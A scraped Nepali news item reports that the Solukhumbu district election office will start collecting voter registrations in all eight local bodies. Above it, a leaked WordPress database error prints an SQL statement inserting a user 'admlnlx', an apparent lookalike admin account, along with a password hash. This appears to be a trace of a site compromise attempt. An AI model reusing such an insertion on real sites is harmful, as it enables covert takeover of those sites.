WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6NCv/lQcToRGEUYwRgniaTE/XCY3g1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:19:06', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । जिल्ला निर्वाचन कार्यलय सोलुखुम्बुले मंसिर १७ बाट आठ वटै स्थानिय तहमा मतदाता नामावली संकलन कार्य सुरु गर्ने भएको छ । सबै स्थानिय तहमा कर्मचारी खटाई मतदाता नामावली संकलन गर्न लागिएको जिल्ला निर्वाचन कार्यलाय सोलुखुम्बुले जनाएको छ ।
मंगलबार प्रमुख जिल्ला अधिकारी गणेश विक्रम शाहीको अध्यक्षतामा बसेको निर्वाचन तथा अनुगमन समितिको बैठकले मतदाता नामावली संकलन अभियानका लागि सदरमुकाम भन्दा बाहिर ४ जना कर्मचारी मतदाता नामावली संकलन कार्यमा खटाउने र सोलुदुधकुण्ड नगरपालिकामा जिल्ला निर्वाचन कार्यलयबाटनै मतदाता नामावली संकलन गर्ने निर्णय गरेको निर्वाचन कार्यालय सोलुखुम्बुले जनाएको छ ।